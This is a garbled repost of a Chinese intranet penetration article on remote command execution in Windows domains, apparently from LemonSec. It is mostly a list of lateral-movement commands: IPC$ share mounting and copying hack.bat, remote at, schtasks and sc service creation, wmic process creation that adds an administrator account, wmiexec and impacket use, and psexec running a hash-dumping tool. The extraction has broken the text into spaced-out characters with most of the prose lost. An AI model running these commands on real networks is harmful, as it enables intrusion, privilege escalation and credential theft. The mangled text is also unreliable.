[21396] 2020-11-09_内网渗透之域渗透命令执行总结

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2020-11-09_内网渗透之域渗透命令执行总结   L e m o n S e c   2 0 2 0 - 1 1 - 0 9 A D A c t i v e   D i r e c t o r y D o m a i n W i n d o w s 访 ( T r u s t   R e l a t i o n ) 使 使 a d i p c i p c - > - >   s e c p o l . m s c - > - > - > 访 > > - g p e d i t . m s c   W i n d o w s
1 2 3 4 5 6 n e t   u s e   z :   I P c $   " p a s s w d "   / u s e r : " a d m i n " c o p y   h a c k . b a t   i p c $ # n e t   u s e   I P i p c $   / d e l 使 a t ( w i n 1 0 ) w i n d o w s   E v e n t   l o g T a s k   S c h e d u l e r i p c 1 2 a t   1 7 0 . 1 7 0 . 6 4 . 1 9   2 3 : 0 0   c : w i n d o w s s y s t e m 3 2 c a l c . e x e a t   1 7 0 . 1 7 0 . 6 4 . 1 9   1   d e l e t e   / y e s   # 1 s c h t a s k s w i n d o w s   E v e n t   l o g T a s k   S c h e d u l e r i p c
1 2 3 s c h t a s k s   / c r e a t e   / t n   f i r s t T a s k   / t r   " c : w i n d o w s s y s t e m 3 2 c m d . e x e   / c   c a l c "   / s c   o n c e   / s t   0 0 : 0 0   / S   1 7 0 . 1 7 0 . 6 4 . 1 9   / R U   S y s t e m   / u   a d m i n   / p   p a s s w d s c h t a s k s   / r u n   / t n   f i r s t T a s k   / S   1 7 0 . 1 7 0 . 6 4 . 1 9   / u   a d m i n   / p   p a s s w d s c h t a s k s   / F   / d e l e t e   / t n   f i r s t T a s k   / S   1 7 0 . 1 7 0 . 6 4 . 1 9   / u   a d m i n   / p   p a s s w d t e l n e t t e l n e t 1 2 t e l n e t   i p s c 1 2 w i n d o w s 2 0 0 3 w i n d o w s   X P 1 2 3 s c   1 7 0 . 1 7 0 . 6 4 . 1 9   c r e a t e   t e s t S C   b i n P a t h =   " c m d . e x e   / c   s t a r t   c : w i n d o w s h a c k . b a t " s c   1 7 0 . 1 7 0 . 6 4 . 1 9   s t a r t   t e s t S C s c   1 7 0 . 1 7 0 . 6 4 . 1 9   d e l e t e   t e s t S C w m i c w m i 1 3 5
1 2 3 w m i c   / n o d e : 1 7 0 . 1 7 0 . 6 4 . 1 9   / u s e r : a d m i n   / p a s s w o r d : p a s s w d   p r o c e s s   c a l l   c r e a t e   " c m d . e x e   / c   c a l c . e x e " w m i c   / n o d e : 1 7 0 . 1 7 0 . 6 4 . 1 9   / u s e r : a d m i n   / p a s s w o r d : p a s s w d   p r o c e s s   c a l l   c r e a t e   " c m d . e x e   / c   n e t   u s e r   t e s t   1 2 3 4 5 6   / a d d   & &   n e t   l o c a l g r o u p   a d m i n i s t r a t o r s   t e s t   / a d d " w m i e x e c . v b s ( ) w m i 1 3 5 v m i e x e c . v b s 1 2 3 4 5 6 c s c r i p t . e x e   / / n o l o g o   w m i e x e c . v b s   / s h e l l   1 7 0 . 1 7 0 . 6 4 . 1 9   a d m i n   p a s s w d c s c r i p t . e x e   w m i e x e c . v b s   / c m d   1 7 0 . 1 7 0 . 6 4 . 1 9   a d m i n   p a s s w d   " c m d k e y   / l i s t " c s c r i p t . e x e   w m i e x e c . v b s   / c m d   1 7 0 . 1 7 0 . 6 4 . 1 9   a d m i n   p a s s w d   c : p r o g r a m d a t a t e s t . b a t # - w a i t 5 0 0 0   5 s - p e r s i s t     P I D 便   n c   i m p a c k e t s   w m i e x e c ( ) w m i 1 3 5 1 2 3 g i t   c l o n e   h t t p s : / / g i t h u b . c o m / S e c u r e A u t h C o r p / i m p a c k e t / p i p   i n s t a l l   - r   r e q u i r e m e n t s . t x t p i p   i n s t a l l   i m p a c k e t
1 2 # s h e l l p y t h o n   w m i e x e c . p y   a d m i n : p a s s w d @ 1 7 0 . 1 7 0 . 6 4 . 1 9 p s e x e c ( ) a d m i n $   h t t p s : / / d o c s . m i c r o s o f t . c o m / e n - u s / s y s i n t e r n a l s / d o w n l o a d s / p s e x e c   1 2 3 4 5 6 7 8 9 1 0 1 1 1 2 1 3 # s h e l l p s e x e c   1 7 0 . 1 7 0 . 6 4 . 1 9   - u   a d m i n   - p   p a s s w d   c m d # p s e x e c   1 7 0 . 1 7 0 . 6 4 . 1 9   - u   a d m i n   - p   p a s s w d   - s   c m d   / c   " c a l c . e x e " # p s e x e c   1 7 0 . 1 7 0 . 6 4 . 1 9   - u   a d m i n   - p   p a s s w d   - c   C : U s e r s A d m i n i s t r a t o r D e s k t o p G e t H a s h e s . e x e # a c c e p t e u l a   , 便 - s     n t   a u t h o r i t y s y s t e m   - h   - d   使 i p     @ i p . t x t   (   i p   ) 3 3 8 9
m s t s c L e t i c i a L e t i c i a ' s   B l o g 2 0 2 0 h w H W D N S c t f -   - a n d r o i d L e m o n S e c
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则